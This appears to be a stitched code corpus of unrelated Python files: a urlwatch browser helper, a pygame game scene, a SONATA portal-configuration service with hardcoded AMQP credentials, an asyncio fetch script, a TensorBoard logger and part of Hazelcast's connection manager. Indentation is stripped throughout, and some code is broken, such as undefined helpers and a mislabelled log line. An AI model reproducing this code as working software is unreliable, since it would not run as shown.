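    ]
    merged = timings.get_merged_timings([{'name': 'b.py', 'time': 3}])
    # -> [{'name': 'a.py', 'time': 5}, {'name': 'b.py', 'time': 3}]
    return merged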
if __name__ == '__main__':
main()
|
browser.py
|
# -*- coding: utf-8 -*-
#
# This file is part of urlwatch (https://thp.io/2008/urlwatch/).
# Copyright (c) 2008-2021 Thomas Perl <m@thp.io>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import pyppeteer
import asyncio
import threading
from .cli import setup_logger
logger = logging.getLogger(__name__)
class BrowserLoop(object):
def __init__(self):
self._event_loop = asyncio.new_event_loop()
self._browser = self._event_loop.run_until_complete(self._launch_browser())
self._loop_thread = threading.Thread(target=self._event_loop.run_forever)
self._loop_thread.start()
@asyncio.coroutine
def _launch_browser(self):
browser = yield from pyppeteer.launch()
for p in (yield from browser.pages()):
yield from p.close()
return browser
@asyncio.coroutine
def _get_content(self, url, wait_until=None):
context = yield from self._browser.createIncognitoBrowserContext()
page = yield from context.newPage()
opts = {}
if wait_until is not None:
opts['waitUntil'] = wait_until
yield from page.goto(url, opts)
content = yield from page.content()
yield from context.close()
return content
def process(self, url, wait_until=None):
coroutine = self._get_content(url, wait_until=wait_until)
return asyncio.run_coroutine_threadsafe(coroutine, self._event_loop).result()
def destroy(self):
self._event_loop.call_soon_threadsafe(self._event_loop.stop)
self._loop_thread.join()
self._loop_thread = None
self._event_loop.run_until_complete(self._browser.close())
self._browser = None
self._event_loop = None
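# --- Hedged usage sketch (editor's addition) ---
# BrowserLoop.process() can be called from any thread: it hands the coroutine
# to the dedicated event-loop thread via run_coroutine_threadsafe() and blocks
# on the returned future. The URL is a placeholder; launching the browser
# requires a working pyppeteer/Chromium install.
def _example_browser_loop():
    loop = BrowserLoop()
    try:
        html = loop.process('https://example.com/', wait_until='networkidle0')
    finally:
        loop.destroy()
    return html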
class BrowserContext(object):
_BROWSER_LOOP = None
_BROWSER_LOCK = threading.Lock()
_BROWSER_REFCNT = 0
def __init__(self):
with BrowserContext._BROWSER_LOCK:
if BrowserContext._BROWSER_REFCNT == 0:
logger.info('Creating browser main loop')
BrowserContext._BROWSER_LOOP = BrowserLoop()
BrowserContext._BROWSER_REFCNT += 1
def process(self, url, wait_until=None):
return BrowserContext._BROWSER_LOOP.process(url, wait_until=wait_until)
def close(self):
with BrowserContext._BROWSER_LOCK:
BrowserContext._BROWSER_REFCNT -= 1
if BrowserContext._BROWSER_REFCNT == 0:
logger.info('Destroying browser main loop')
BrowserContext._BROWSER_LOOP.destroy()
BrowserContext._BROWSER_LOOP = None
def main():
import argparse
parser = argparse.ArgumentParser(description='Browser handler')
parser.add_argument('url', help='URL to retrieve')
parser.add_argument('-v', '--verbose', action='store_true', help='show debug output')
parser.add_argument('-w',
'--wait-until',
dest='wait_until',
choices=['load', 'domcontentloaded', 'networkidle0', 'networkidle2'],
help='When to consider a pageload finished')
args = parser.parse_args()
setup_logger(args.verbose)
# Create the context outside the try block so the finally clause cannot
# hit a NameError if construction itself fails.
ctx = BrowserContext()
try:
    print(ctx.process(args.url, wait_until=args.wait_until))
finally:
    ctx.close()
if __name__ == '__main__':
main()
|
GameScene.py
|
import threading
import time
import pygame  # used directly below (display, font, events, transform)
from pygame import Rect
from engine.Animation import Animation
from engine.const import *
from engine.Obstacle import Obstacle
from engine.Player import Player
from engine.Settings import Settings
from engine.Track import Track
from .Scene import Scene
from .ScoreScene import ScoreScene
class GameScene(Scene):
def _start(self):
"""
Init and start new game scene
:return: None
"""
self.tileset = self.manager.get_image("tileset.png")
self.main_theme_music = self.manager.get_music("main-theme.ogg")
self.explosion_sound = self.manager.get_sound("boom.ogg")
self.width, self.height = pygame.display.get_surface().get_size()
self.track = Track()
self.obstacle = Obstacle(self.track)
self.player = Player(self.track)
self.player.attach()
self.explosion_sprite_size = 192
self.explosion_speed = 4
self.explosion = Animation(self.manager.get_image("explosion.png"),
self.explosion_sprite_size,
self.explosion_sprite_size,
self.explosion_speed)
self.is_explosion_started = False
self.settings = Settings()
self.font = pygame.font.SysFont("Monospace", 40, bold=False, italic=False)
self.calculate_tile_size()
self.make_threads()
def make_threads(self):
"""
Start threads to change game state
:return: None
"""
threading.Thread(target=self.update_track).start()
threading.Thread(target=self.update_move).start()
if self.settings['music']:
self.main_theme_music.play()
def update_track(self):
"""
Updating track for next game state
:return: None
"""
while not self.is_end():
if not self.obstacle.wait:
self.obstacle.attach()
self.obstacle.wait = OBSTACLE_WAIT_FOR_NEXT if not self.obstacle.wait else self.obstacle.wait - 1
if self.player.is_dead:
ScoreScene.save(self.player.score)
self.is_explosion_started = True
self.player.detach()
self.explosion.start()
if self.settings['music']:
self.explosion_sound.play()
break
self.player.detach()
self.track.move()
self.player.attach()
self.player.score += 1
if self.player.score % (SPEED_INCREASE_SCORE * self.track.level) == 0:
self.track.speed += 1
if self.player.score % (LEVEL_INCREASE_SCORE * self.track.level) == 0:
self.track.level += 1
self.player.lives_count = int(self.player.lives_count * PLAYER_LIVES_INCREASE)
self.track.speed = self.track.level
track_sleep_time = TRACK_MOVE_SLEEP_TIME / self.track.get_speed()
time.sleep(track_sleep_time)
def update_move(self):
"""
Update player movement and handle the player's position on the track
:return: None
"""
while not self.is_end():
if self.player.is_dead:
break
self.player.move()
time.sleep(PLAYER_MOVE_SLEEP_TIME)
def _event(self, event):
"""
Handle incoming events
:param event: any occurred event
:return: None
"""
for e in event.get():
if e.type == pygame.KEYDOWN:
if e.key == pygame.K_p:
self.set_next_scene("pause")
self.the_end()
elif e.key == pygame.K_ESCAPE:
ScoreScene.save(self.player.score)
self.set_next_scene("menu")
self.the_end()
elif e.key == pygame.K_LEFT:
self.player.direction = "left"
self.player.move()
elif e.key == pygame.K_RIGHT:
self.player.direction = "right"
self.player.move()
elif e.key == pygame.K_UP:
self.track.speed += 1
elif e.key == pygame.K_DOWN:
self.track.speed -= 1
elif e.type == pygame.KEYUP:
self.player.direction = None
def _update(self, dt):
"""
Update scene by time
:param dt: time interval passed since the previous call
:return: None
"""
if self.is_explosion_started:
self.explosion.update(dt)
if not self.explosion.is_start() and self.player.is_dead:
self.set_next_scene("game_over")
self.the_end()
def _draw(self, dt):
"""
Redraw the game according to its current state
:param dt: time interval passed since the previous call
:return: None
"""
self.display.fill(BACKGROUND_COLOR)
self.draw_field()
self.draw_score()
if self.explosion.is_start():
player_center = [x - int(self.explosion_sprite_size / 2) for x in self.player.get_center(self.tile_size)]
self.display.blit(self.explosion.sprite, player_center, self.explosion.get_coords())
def the_end(self):
self.main_theme_music.stop()
super().the_end()
def calculate_tile_size(self):
field_width = self.width / 2
field_height = self.height
tile_height = field_height / self.track.tiles_y
tile_width = field_width / self.track.tiles_x
self.tile_size = int(tile_width if tile_height > tile_width else tile_height)
self.scaled_tile = pygame.transform.scale(self.tileset, (self.tile_size * TILES_COUNT, self.tile_size))
def draw_field(self):
margin = 1
for x in range(self.track.tiles_x):
for y in range(self.track.tiles_y):
# Draw tile in (x,y)
# get rect() area; select tile from tileset
destination = Rect(x * self.tile_size, y * self.tile_size, self.tile_size, self.tile_size)
src = Rect(self.track.tiles[x][y] * self.tile_size, 0, self.tile_size - margin, self.tile_size - margin)
self.display.blit(self.scaled_tile, destination, src)
def draw_score(self):
x = self.width / 2 + self.tile_size
y = self.tile_size
self.display.blit(self.font.render("Счёт: " + str(self.player.score), True, (0, 0, 0)), (x, y))
self.display.blit(self.font.render("Скорость: " + str(self.track.speed), True, (0, 0, 0)), (x, y*2))
self.display.blit(self.font.render("Жизней: " + str(self.player.lives_count), True, (0, 0, 0)), (x, y*3))
self.display.blit(self.font.render("Уровень: " + str(self.track.level), True, (0, 0, 0)), (x, y*4))
|
portal_configure.py
|
"""
Copyright (c) 2015 SONATA-NFV
ALL RIGHTS RESERVED.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Neither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written
permission.
This work has been performed in the framework of the SONATA project,
funded by the European Commission under Grant number 671517 through
the Horizon 2020 and 5G-PPP programmes. The authors would like to
acknowledge the contributions of their colleagues of the SONATA
partner consortium (www.sonata-nfv.eu).
"""
import logging
import yaml
from sonsmbase.smbase import sonSMbase
import websocket
import _thread
import time
import sys
import pika
from threading import Thread
from websocket_server import WebsocketServer
from json import loads, dumps
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger("ssm-portal-configure-1")
LOG.setLevel(logging.DEBUG)
logging.getLogger("son-mano-base:messaging").setLevel(logging.INFO)
class Server:
# Called for every client connecting (after handshake)
def new_client(self, client, server):
logging.warning("*********************"+"New client connected and was given id"+ str(client['id']))
# Called for every client disconnecting
def client_left(self, client, server):
logging.warning("*********************"+"Client("+str(client['id'])+") disconnected")
# Called when a client sends a message
def message_received(self, client, server, message):
if len(message) > 200:
message = message[:200]+'..'
logging.warning("*********************"+"Client("+str(client['id'])+") said:"+message)
# Format message
messageDict = loads(message)
actionName = messageDict['name']
def amqp_send():
#self.manoconn.publish(topic='specific.manager.registry.ssm.status', message=yaml.dump(
# {'name':self.specific_manager_id,'status': 'UP and Running'}))
# Subscribe to the topic that the SLM will be sending on
#topic = 'generic.ssm.' + str(self.sfuuid)
#self.manoconn.subscribe(self.received_request, topic)
credentials = pika.PlainCredentials('wolke', 'wolke')
connection = pika.BlockingConnection(pika.ConnectionParameters(credentials=credentials,host='10.10.243.101'))
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='',
routing_key='hello',
body='Hello World!')
logging.warning(" [x] Sent 'Hello World!'")
connection.close()
#TODO relay request on queue and wait for response
def sendMessage():
logging.warning("*********************"+"Sending Message")
amqp_send()
logging.warning("*********************"+"Sending Message")
amqp_send()
toSend = None
if actionName == "fsm start":
fsmName = messageDict['Data']['name']
fsmID = messageDict['Data']['id']
toSend = {"name": actionName, "Data": {
"name": fsmName,
"id": fsmID,
"state": "started"
}
}
if actionName == "fsm stop":
fsmName = messageDict['Data']['name']
fsmID = messageDict['Data']['id']
toSend = {"name": actionName, "Data": {
"name": fsmName,
"id": fsmID,
"state": "stopped"
}
}
if actionName == "basic start":
logging.warning("*********************"+actionName)
toSend = {
"name": "basic start",
"data":
[
{"name": "Firewall", "id": "1", "state": "started"},
{"name": "VPN", "id": "2", "state": "started"}
],
}
if actionName == "basic stop":
logging.warning("*********************"+actionName)
toSend = {
"name": "basic stop",
"data":
[
{"name": "Firewall", "id": "1", "state": "stopped"},
{"name": "VPN", "id": "2", "state": "stopped"}
],
}
if actionName == "anon start":
logging.warning("*********************"+actionName)
toSend = {
"name": "anon start",
"data":
[
{"name": "Firewall", "id": "1", "state": "started"},
{"name": "VPN", "id": "2", "state": "started"},
{"name": "TOR", "id": "3", "state": "started"},
#{"name": "HTTP Proxy", "id": "4", "state": "started"},
{"name": "IDS", "id": "5", "state": "started"}
],
}
if actionName == "anon stop":
logging.warning("*********************"+actionName)
toSend = {
"name": "anon stop",
"data":
[
{"name": "Firewall", "id": "1", "state": "stopped"},
{"name": "VPN", "id": "2", "state": "stopped"},
{"name": "TOR", "id": "3", "state": "stopped"},
#{"name": "HTTP Proxy", "id": "4", "state": "stopped"},
{"name": "IDS", "id": "5", "state": "stopped"}
],
}
try:
toSendJson = dumps(toSend)
logging.warning("*********************"+toSendJson)
server.send_message(client, toSendJson)
except Exception as e:
logging.warning("*********************"+str(e))
sendMessage()
def listenToFSMRequests(self):
#logging.warning("*********************","Listening to Requests...!")
logging.warning("*********************Listening to Requests...!")
port=9191
host="0.0.0.0"
#host="selfservice-ssm"
server = WebsocketServer(port, host=host)
server.set_fn_new_client(self.new_client)
server.set_fn_client_left(self.client_left)
server.set_fn_message_received(self.message_received)
server.run_forever()
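# --- Hedged protocol sketch (editor's addition) ---
# Shape of the JSON messages message_received() expects from the portal and of
# the reply it sends back for an 'fsm start' action. The field values are
# illustrative only.
EXAMPLE_FSM_START_REQUEST = {
    "name": "fsm start",
    "Data": {"name": "Firewall", "id": "1"},
}
EXAMPLE_FSM_START_REPLY = {
    "name": "fsm start",
    "Data": {"name": "Firewall", "id": "1", "state": "started"},
}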
class Portal_Configure(sonSMbase):
def __init__(self):
"""
:param specific_manager_type: specifies the type of specific manager that could be either fsm or ssm.
:param service_name: the name of the service that this specific manager belongs to.
:param function_name: the name of the function that this specific manager belongs to, will be null in SSM case
:param specific_manager_name: the actual name of specific manager (e.g., scaling, placement)
:param id_number: the specific manager id number which is used to distinguish between multiple SSM/FSM
that are created for the same objective (e.g., scaling with algorithm 1 and 2)
:param version: version
:param description: description
"""
self.specific_manager_type = 'ssm'
self.service_name = 'psa'
self.specific_manager_name = 'portal-configure'
self.id_number = '1'
self.version = 'v0.1'
self.counter = 0
self.nsd = None
self.vnfs = None
self.description = "An empty SSM"
super(self.__class__, self).__init__(specific_manager_type= self.specific_manager_type,
service_name= self.service_name,
specific_manager_name = self.specific_manager_name,
id_number = self.id_number,
version = self.version,
description = self.description)
self.setup_portal_conn()
self.run()
def on_registration_ok(self):
LOG.info("Received registration ok event.")
self.manoconn.publish(topic='specific.manager.registry.ssm.status', message=yaml.dump(
{'name':self.specific_manager_id,'status': 'UP and Running'}))
# Subscribe to the topic that the SLM will be sending on
topic = 'generic.ssm.' + str(self.sfuuid)
self.manoconn.subscribe(self.received_request, topic)
# Does this go here?
def configure_event(self, content):
"""
This method handles a configure event.
"""
LOG.info("Performing life cycle configure event")
LOG.info("content: " + str(content.keys()))
# TODO: Add the configure logic. The content is a dictionary that
# contains the required data
nsr = content['nsr']
vnfrs = content['vnfrs']
for vnfr in vnfrs:
if (vnfr['virtual_deployment_units'][0]['vm_image']) == 'http://files.sonata-nfv.eu/son-psa-pilot/vpn-vnf/sonata-vpn.qcow2':
vpn_ip = vnfr['virtual_deployment_units'][0]['vnfc_instance'] [0]['connection_points'][0]['interface']['address']
LOG.info("vVPN's management IP retrieved: "+vpn_ip)
if (vnfr['virtual_deployment_units'][0]['vm_image']) == 'http://files.sonata-nfv.eu/son-psa-pilot/tor-vnf/sonata-tor.qcow2':
tor_ip = vnfr['virtual_deployment_units'][0]['vnfc_instance'] [0]['connection_points'][0]['interface']['address']
LOG.info("vTOR's management IP retrieved: "+tor_ip)
# instead of sonata-prx, image might be u16squid-micro-x86-64-v04.qcow2
if (vnfr['virtual_deployment_units'][0]['vm_image']) == 'http://files.sonata-nfv.eu/son-psa-pilot/prx-vnf/sonata-prx.qcow2':
prx_ip = vnfr['virtual_deployment_units'][0]['vnfc_instance'] [0]['connection_points'][0]['interface']['address']
LOG.info("vProxy's management IP retrieved: "+prx_ip)
if (vnfr['virtual_deployment_units'][0]['vm_image']) == 'http://files.sonata-nfv.eu/son-psa-pilot/pfSense-vnf/pfsense-vnf.qcow2':
fw_ip = vnfr['virtual_deployment_units'][0]['vnfc_instance'] [0]['connection_points'][0]['interface']['address']
LOG.info("vFW's management IP retrieved: "+prx_ip)
# NOTE: reverse() and the netaddr package are used below but are neither
# defined nor imported in this module; reverse() presumably flips the
# octet order of the IP before it is converted to an integer.
iprev = reverse(vpn_ip)
LOG.info("Got the reverse IP to be turned to integer: "+iprev)
ipInt = int(netaddr.IPAddress(iprev))
LOG.info("Got the Integer from the IP: "+str(ipInt))
def setup_portal_conn(self):
"""
Setup the connection with the portal.
"""
# TODO: setup the connection with the portal
pass
def run(self):
"""
Start waiting for messages from portal.
"""
self.get_from_portal()
def get_from_portal(self):
"""
This method handles data coming from portal to SSM.
"""
# TODO: screen for messages
content = {}
# Start SSM process
self.on_input_from_portal(content)
def push_to_portal(self, content):
"""
This method handles data going from the SSM to the portal.
"""
# TODO: inform the portal when changes to the psa configuration occurred.
pass
def on_input_from_portal(self, content):
"""
This method is called when the SSM receives a request from the portal.
"""
# TODO: create request for SLM based on content from portal
nsd = {}
vnfds = [{}, {}, {}]
request = {}
request['schedule'] = ["vnf_chain", "inform_ssm"]
request['payload'] = {'nsd': nsd, 'vnfds': vnfds}
# Make request to SLM
topic = 'generic.ssm.' + str(self.sfuuid)
self.manoconn.call_async(self.slm_response,
topic,
yaml.dump(request))
def slm_response(self, ch, method, prop, payload):
"""
This method handles the response from the SLM on the request to change
the chaining of the psa service.
"""
content = yaml.load(payload, Loader=yaml.SafeLoader)
# TODO: Interact with the portal
data = {}
self.push_to_portal(data)
def main():
Portal_Configure()
server = Server()
# Pass the bound method itself as the target; calling it here would block before the thread starts
Thread(target=server.listenToFSMRequests).start()
if __name__ == '__main__':
main()
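# --- Illustrative sketch (not part of the original SSM) ---
# configure_event above converts a management IP into an integer by first
# reversing it with a reverse() helper defined elsewhere in this file and
# then going through netaddr. Assuming the helper flips the octet order,
# the conversion looks roughly like this (the sample IP is hypothetical):
def _example_ip_to_int(ip="10.0.0.1"):
    import netaddr
    reversed_ip = ".".join(reversed(ip.split(".")))  # "1.0.0.10"
    return int(netaddr.IPAddress(reversed_ip))       # 16777226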
|
async_1.py
|
import webbrowser
import socket
import asyncio
import threading
url = "https://libgen.is/"
async def fetch(i):
#sock = socket.socket()
r, w = await asyncio.open_connection(
'libgen.is', 80)
# Use an origin-form request target; the absolute-URL form is only meant for proxies
request = 'GET / HTTP/1.0\r\nHost: libgen.is\r\n\r\n'
w.write(request.encode())
await w.drain()
response = b''
print('start-', i)
chunk = await r.read(4096)
while chunk:
response += chunk
chunk = await r.read(4096)
print('received-', i)
def start_browser():
import time
s = time.perf_counter()
threads = []
for x in range(10):
obj = threading.Thread(target=fetch, args=(x,))
threads.append(obj)
for a in threads:
a.start()
for b in threads:
b.join()
elapsed = time.perf_counter() - s
print(f"{__file__} executed in {elapsed:0.2f} seconds.")
#start_browser()
async def main():
await asyncio.gather(fetch(0),fetch(1),fetch(2),fetch(3),fetch(4),fetch(5), fetch(6), fetch(7), fetch(8), fetch(9))
if __name__ == "__main__":
import time
s = time.perf_counter()
import sys
# The Windows-only selector policy does not exist on other platforms, so guard it
if sys.platform == "win32": asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
asyncio.run(main())
elapsed = time.perf_counter() - s
print(f"{__file__} executed in {elapsed:0.2f} seconds.")
|
model_logging.py
|
import numpy as np
import scipy.misc
import threading
try:
from StringIO import StringIO # Python 2.7
except ImportError:
from io import BytesIO # Python 3.x
class Logger:
def __init__(self,
log_interval=50,
validation_interval=200,
generate_interval=500,
trainer=None,
generate_function=None):
self.trainer = trainer
self.log_interval = log_interval
self.validation_interval = validation_interval
self.generate_interval = generate_interval
self.accumulated_loss = 0
self.generate_function = generate_function
if self.generate_function is not None:
self.generate_thread = threading.Thread(target=self.generate_function)
self.generate_thread.daemon = True
def log(self, current_step, current_loss):
self.accumulated_loss += current_loss
if current_step % self.log_interval == 0:
self.log_loss(current_step)
self.accumulated_loss = 0
if current_step % self.validation_interval == 0:
self.validate(current_step)
if current_step % self.generate_interval == 0:
self.generate(current_step)
def log_loss(self, current_step):
avg_loss = self.accumulated_loss / self.log_interval
print("loss at step " + str(current_step) + ": " + str(avg_loss))
def validate(self, current_step):
avg_loss, avg_accuracy = self.trainer.validate()
print("validation loss: " + str(avg_loss))
print("validation accuracy: " + str(avg_accuracy * 100) + "%")
def generate(self, current_step):
if self.generate_function is None:
return
if self.generate_thread.is_alive():
print("Last generate is still running, skipping this one")
else:
self.generate_thread = threading.Thread(target=self.generate_function,
args=[current_step])
self.generate_thread.daemon = True
self.generate_thread.start()
# Code referenced from https://gist.github.com/gyglim/1f8dfb1b5c82627ae3efcfbbadb9f514
class TensorboardLogger(Logger):
def __init__(self,
log_interval=50,
validation_interval=200,
generate_interval=500,
trainer=None,
generate_function=None,
log_dir='logs'):
# Import TensorFlow lazily so it is only required when this logger is used,
# and bind it at module level because the summary helpers below reference `tf`
global tf
import tensorflow as tf
super().__init__(log_interval, validation_interval, generate_interval, trainer, generate_function)
self.writer = tf.summary.FileWriter(log_dir)
def log_loss(self, current_step):
# loss
avg_loss = self.accumulated_loss / self.log_interval
self.scalar_summary('loss', avg_loss, current_step)
# parameter histograms
for tag, value, in self.trainer.model.named_parameters():
tag = tag.replace('.', '/')
self.histo_summary(tag, value.data.cpu().numpy(), current_step)
if value.grad is not None:
self.histo_summary(tag + '/grad', value.grad.data.cpu().numpy(), current_step)
def validate(self, current_step):
avg_loss, avg_accuracy = self.trainer.validate()
self.scalar_summary('validation loss', avg_loss, current_step)
self.scalar_summary('validation accuracy', avg_accuracy, current_step)
def log_audio(self, step):
samples = self.generate_function()
tf_samples = tf.convert_to_tensor(samples)
self.audio_summary('audio sample', tf_samples, step, sr=16000)
def scalar_summary(self, tag, value, step):
"""Log a scalar variable."""
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])
self.writer.add_summary(summary, step)
def image_summary(self, tag, images, step):
"""Log a list of images."""
img_summaries = []
for i, img in enumerate(images):
# Write the image to a string
try:
s = StringIO()
except:
s = BytesIO()
scipy.misc.toimage(img).save(s, format="png")
# Create an Image object
img_sum = tf.Summary.Image(encoded_image_string=s.getvalue(),
height=img.shape[0],
width=img.shape[1])
# Create a Summary value
img_summaries.append(tf.Summary.Value(tag='%s/%d' % (tag, i), image=img_sum))
# Create and write Summary
summary = tf.Summary(value=img_summaries)
self.writer.add_summary(summary, step)
def audio_summary(self, tag, sample, step, sr=16000):
with tf.Session() as sess:
audio_summary = tf.summary.audio(tag, sample, sample_rate=sr, max_outputs=4)
summary = sess.run(audio_summary)
self.writer.add_summary(summary, step)
self.writer.flush()
def histo_summary(self, tag, values, step, bins=200):
"""Log a histogram of the tensor of values."""
# Create a histogram using numpy
counts, bin_edges = np.histogram(values, bins=bins)
# Fill the fields of the histogram proto
hist = tf.HistogramProto()
hist.min = float(np.min(values))
hist.max = float(np.max(values))
hist.num = int(np.prod(values.shape))
hist.sum = float(np.sum(values))
hist.sum_squares = float(np.sum(values ** 2))
# Drop the start of the first bin
bin_edges = bin_edges[1:]
# Add bin edges and counts
for edge in bin_edges:
hist.bucket_limit.append(edge)
for c in counts:
hist.bucket.append(c)
# Create and write Summary
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, histo=hist)])
self.writer.add_summary(summary, step)
self.writer.flush()
def tensor_summary(self, tag, tensor, step):
tf_tensor = tf.Variable(tensor).to_proto()
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, tensor=tf_tensor)])
#summary = tf.summary.tensor_summary(name=tag, tensor=tensor)
self.writer.add_summary(summary, step)
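# --- Illustrative usage sketch (not part of the original module) ---
# A minimal wiring of the plain Logger above; the generation callback is a
# hypothetical stand-in and no trainer is attached, so the validation
# interval is kept out of reach.
if __name__ == "__main__":
    def _fake_generate(step=None):
        print("generating samples at step", step)

    _logger = Logger(log_interval=2, validation_interval=10 ** 6,
                     generate_interval=4, generate_function=_fake_generate)
    for _step, _loss in enumerate([0.9, 0.8, 0.7, 0.6], start=1):
        _logger.log(_step, _loss)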
|
connection.py
|
import io
import logging
import random
import struct
import sys
import threading
import time
import uuid
from collections import OrderedDict
from hazelcast import six, __version__
from hazelcast.config import ReconnectMode
from hazelcast.core import AddressHelper, CLIENT_TYPE, SERIALIZATION_VERSION
from hazelcast.errors import (
AuthenticationError,
TargetDisconnectedError,
HazelcastClientNotActiveError,
InvalidConfigurationError,
ClientNotAllowedInClusterError,
IllegalStateError,
ClientOfflineError,
)
from hazelcast.future import ImmediateFuture, ImmediateExceptionFuture
from hazelcast.invocation import Invocation
from hazelcast.lifecycle import LifecycleState
from hazelcast.protocol.client_message import (
SIZE_OF_FRAME_LENGTH_AND_FLAGS,
Frame,
InboundMessage,
ClientMessageBuilder,
)
from hazelcast.protocol.codec import client_authentication_codec, client_ping_codec
from hazelcast.util import AtomicInteger, calculate_version, UNKNOWN_VERSION
_logger = logging.getLogger(__name__)
class _WaitStrategy(object):
def __init__(self, initial_backoff, max_backoff, multiplier, cluster_connect_timeout, jitter):
self._initial_backoff = initial_backoff
self._max_backoff = max_backoff
self._multiplier = multiplier
self._cluster_connect_timeout = cluster_connect_timeout
self._jitter = jitter
self._attempt = None
self._cluster_connect_attempt_begin = None
self._current_backoff = None
def reset(self):
self._attempt = 0
self._cluster_connect_attempt_begin = time.time()
self._current_backoff = min(self._max_backoff, self._initial_backoff)
def sleep(self):
self._attempt += 1
time_passed = time.time() - self._cluster_connect_attempt_begin
if time_passed > self._cluster_connect_timeout:
_logger.warning(
"Unable to get live cluster connection, cluster connect timeout (%ds) is reached. "
"Attempt %d.",
self._cluster_connect_timeout,
self._attempt,
)
return False
# random between (-jitter * current_backoff, jitter * current_backoff)
sleep_time = self._current_backoff + self._current_backoff * self._jitter * (
2 * random.random() - 1
)
sleep_time = min(sleep_time, self._cluster_connect_timeout - time_passed)
_logger.warning(
"Unable to get live cluster connection, retry in %.2fs, attempt: %d, "
"cluster connect timeout: %ds, max backoff: %ds",
sleep_time,
self._attempt,
self._cluster_connect_timeout,
self._max_backoff,
)
time.sleep(sleep_time)
self._current_backoff = min(self._current_backoff * self._multiplier, self._max_backoff)
return True
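# --- Illustrative sketch (not part of the Hazelcast client) ---
# The backoff sequence produced by _WaitStrategy.sleep() can be previewed
# without sleeping; the parameters below are hypothetical and simply mirror
# the constructor arguments.
def _preview_backoff(initial=1.0, maximum=30.0, multiplier=2.0, jitter=0.2, attempts=5):
    backoff = min(maximum, initial)
    delays = []
    for _ in range(attempts):
        # random term in (-jitter * backoff, +jitter * backoff), as in sleep()
        delays.append(backoff + backoff * jitter * (2 * random.random() - 1))
        backoff = min(backoff * multiplier, maximum)
    return delays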
class _AuthenticationStatus(object):
AUTHENTICATED = 0
CREDENTIALS_FAILED = 1
SERIALIZATION_VERSION_MISMATCH = 2
NOT_ALLOWED_IN_CLUSTER = 3
class ConnectionManager(object):
"""ConnectionManager is responsible for managing ``Connection`` objects."""
def __init__(
self,
client,
config,
reactor,
address_provider,
lifecycle_service,
partition_service,
cluster_service,
invocation_service,
near_cache_manager,
):
self.live = False
self.active_connections = {} # uuid to connection, must be modified under the _lock
self.client_uuid = uuid.uuid4()
self._client = client
self._config = config
self._reactor = reactor
self._address_provider = address_provider
self._lifecycle_service = lifecycle_service
self._partition_service = partition_service
self._cluster_service = cluster_service
self._invocation_service = invocation_service
self._near_cache_manager = near_cache_manager
self._smart_routing_enabled = config.smart_routing
self._wait_strategy = self._init_wait_strategy(config)
self._reconnect_mode = config.reconnect_mode
self._heartbeat_manager = _HeartbeatManager(
self, self._client, config, reactor, invocation_service
)
self._connection_listeners = []
self._connect_all_members_timer = None
self._async_start = config.async_start
self._connect_to_cluster_thread_running = False
self._pending_connections = {} # must be modified under the _lock
self._addresses_to_connections = {} # must be modified under the _lock
self._shuffle_member_list = config.shuffle_member_list
self._lock = threading.RLock()
self._connection_id_generator = AtomicInteger()
self._labels = frozenset(config.labels)
self._cluster_id = None
self._load_balancer = None
def add_listener(self, on_connection_opened=None, on_connection_closed=None):
"""Registers a ConnectionListener.
If the same listener is registered multiple times, it will be notified multiple times.
Args:
on_connection_opened (function): Function to be called when a connection is opened. (Default value = None)
on_connection_closed (function): Function to be called when a connection is removed. (Default value = None)
"""
self._connection_listeners.append((on_connection_opened, on_connection_closed))
def get_connection(self, member_uuid):
return self.active_connections.get(member_uuid, None)
def get_connection_from_address(self, address):
return self._addresses_to_connections.get(address, None)
def get_random_connection(self):
if self._smart_routing_enabled:
member = self._load_balancer.next()
if member:
connection = self.get_connection(member.uuid)
if connection:
return connection
# We should not get to this point under normal circumstances.
# Therefore, copying the list should be OK.
for connection in list(six.itervalues(self.active_connections)):
return connection
return None
def start(self, load_balancer):
if self.live:
return
self.live = True
self._load_balancer = load_balancer
self._heartbeat_manager.start()
self._connect_to_cluster()
if self._smart_routing_enabled:
self._start_connect_all_members_timer()
def shutdown(self):
if not self.live:
return
self.live = False
if self._connect_all_members_timer:
self._connect_all_members_timer.cancel()
self._heartbeat_manager.shutdown()
with self._lock:
for connection_future in six.itervalues(self._pending_connections):
connection_future.set_exception(
HazelcastClientNotActiveError("Hazelcast client is shutting down")
)
# Need to create copy of connection values to avoid modification errors on runtime
for connection in list(six.itervalues(self.active_connections)):
